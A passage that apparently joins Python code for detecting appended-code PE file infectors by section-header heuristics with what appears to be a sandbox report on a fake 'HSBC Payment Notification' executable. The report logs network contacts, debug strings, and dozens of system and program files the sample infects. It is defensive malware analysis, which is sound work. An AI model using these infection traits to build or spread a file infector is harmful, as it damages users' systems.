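    nsec = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    entry = struct.unpack_from("<I", pe, opt + 16)[0]   # same offset in PE32 and PE32+
    secs = []
    for i in range(nsec):
        (name, vsize, va, raw_size, raw_ptr,
         _r, _l, _nr, _nl, chars) = struct.unpack_from(SECTION_FMT, pe, opt + opt_size + 40 * i)
        secs.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                     "vsize": vsize, "raw_size": raw_size, "raw_ptr": raw_ptr,
                     "chars": chars})
    return entry, secs


def infector_indicators(pe: bytes):
    """Heuristic findings for an appended-code infector; an empty list means nothing odd."""
    entry, secs = parse_sections(pe)
    findings = []
    ep_sec = next((s for s in secs
                   if s["va"] <= entry < s["va"] + max(s["vsize"], s["raw_size"])), None)
    if ep_sec is None:
        findings.append("entry point outside any section")
    else:
        if len(secs) > 1 and ep_sec is secs[-1]:
            findings.append(f"entry point in last section {ep_sec['name']!r}")
        if ep_sec["chars"] & IMAGE_SCN_MEM_WRITE and ep_sec["chars"] & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"entry section {ep_sec['name']!r} is writable and executable")
    for s in secs:
        if s["name"] not in STANDARD_NAMES:
            findings.append(f"non-standard section name {s['name']!r}")
    return findings


def build_pe(sections, entry_rva):
    """Constructed test input: a header-only PE32 image with no code, one
    (name, virtual_address, size, characteristics) tuple per section."""
    opt_size = 224   # PE32 optional header
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)            # AddressOfEntryPoint
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt)
    for name, va, size, chars in sections:
        image += struct.pack(SECTION_FMT, name.encode("ascii"), size, va, size, 0, 0, 0, 0, 0, chars)
    return image


CLEAN_LAYOUT = [(".text", 0x1000, 0x1000, 0x60000020),    # code, execute|read
                (".rdata", 0x2000, 0x1000, 0x40000040),   # initialized, read
                (".data", 0x3000, 0x1000, 0xC0000040)]    # initialized, read|write
# Same binary with a trailing read|write|execute section now holding the entry point.
PATCHED_LAYOUT = CLEAN_LAYOUT + [(".xyz", 0x4000, 0x800, 0xE0000020)]

if __name__ == "__main__":
    print("clean:  ", infector_indicators(build_pe(CLEAN_LAYOUT, 0x1234)))
    print("patched:", infector_indicators(build_pe(PATCHED_LAYOUT, 0x4010)))
```

Run against the files listed above (read each into `pe` and call `infector_indicators`), a clean result does not clear a file; it only means this particular pattern is absent. Signature verification against the vendor's certificate chain remains the check that decides whether a binary can stay on the host.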

                  Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49711 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49716 version: TLS 1.2
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000002.00000003.2525911259.0000000002180000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2086108472.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000002.00000003.2582334419.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2590265360.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2581292600.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000002.00000003.2271603992.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ssh-agent.pdb source: armsvc.exe, 00000002.00000003.2175446283.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000002.00000003.2386599960.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000002.00000003.2386599960.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000002.00000003.2401899087.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2124835296.0000000004130000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2156732156.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000002.00000003.2633067846.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2628302766.00000000021A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: crashreporter.pdb source: armsvc.exe, 00000002.00000003.2752944909.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000002.00000003.2313938589.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: armsvc.exe, 00000002.00000003.2520750175.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000002.00000003.2614372784.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdb source: msedge_proxy.exe.2.dr
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000002.00000003.2540240807.00000000019C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2532596834.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
                  Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000002.00000003.2212157226.00000000021B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000002.00000003.2429484091.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000002.00000003.2277891701.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\e\src\out\Release_x64\msedge_proxy.exe.pdbOGP source: msedge_proxy.exe.2.dr
                  Source: Binary string: pingsender.pdb source: armsvc.exe, 00000002.00000003.2804279268.0000000000840000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2111485745.0000000004140000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
                  Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000002.00000003.2401899087.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdb source: AdobeARMHelper.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000002.00000003.2296158721.00000000020F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000002.00000003.2277891701.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdb source: wbengine.exe.2.dr
                  Source: Binary string: private_browsing.pdb source: private_browsing.exe.2.dr
                  Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000002.00000003.2582334419.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2590265360.00000000020E0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2581292600.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000002.00000003.2313938589.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000002.00000003.2449580462.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000002.00000003.2271603992.0000000002130000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000002.00000003.2633067846.0000000002180000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2628302766.00000000021A0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000002.00000003.2158998087.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2508157176.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000002.00000003.2783650894.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000002.00000003.2614372784.0000000002170000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: firefox.pdb source: armsvc.exe, 00000002.00000003.2776337614.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000002.00000003.2489813894.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: firefox.pdbP source: armsvc.exe, 00000002.00000003.2776337614.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000002.00000003.2429484091.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: servertool.exe.2.dr
                  Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000002.00000003.2525911259.0000000002180000.00000004.00001000.00020000.00000000.sdmp, FullTrustNotifier.exe.2.dr
                  Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000002.00000003.2449580462.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000002.00000003.2494075294.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: private_browsing.pdbp source: private_browsing.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000002.00000003.2520750175.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000002.00000003.2783650894.00000000007C0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\java-rmi_objs\java-rmi.pdb source: java-rmi.exe.2.dr
                  Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000002.00000003.2540240807.00000000019C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2532596834.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000002.00000003.2212157226.00000000021B0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000002.00000003.2181024271.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000002.00000003.2181024271.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\AdobeARMHelper.pdbr source: AdobeARMHelper.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000002.00000003.2455646174.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ALG.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2090731702.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: minidump-analyzer.pdb source: minidump-analyzer.exe.2.dr
                  Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2111485745.0000000004140000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: Aut2exe_x64.exe.2.dr
                  Source: Binary string: ALG.pdbGCTL source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2090731702.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.2124835296.0000000004130000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.2156732156.00000000021E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officesvcmgr.exe.2.dr
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000002.00000003.2296158721.00000000020F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdbGCTL source: wbengine.exe.2.dr
                  Source: Binary string: d:\dbs\el\omr\target\x64\ship\c2rsvcmgr\x-none\OfficeSvcMgr.pdb source: officesvcmgr.exe.2.dr
                  Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000002.00000003.2175446283.0000000002200000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000002.00000003.2609607534.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000002.00000003.2158998087.00000000021F0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000002.00000003.2494075294.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000002.00000003.2455646174.0000000002180000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000002.00000003.2609607534.0000000002180000.00000004.00001000.00020000.00000000.sdmp

                  Spreading

                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\vds.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\alg.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7zFM.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\Spectrum.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\Locator.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\AppVClient.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7zG.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\VSSVC.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\wbengine.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\SearchIndexer.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\TieringEngineService.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\AgentService.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
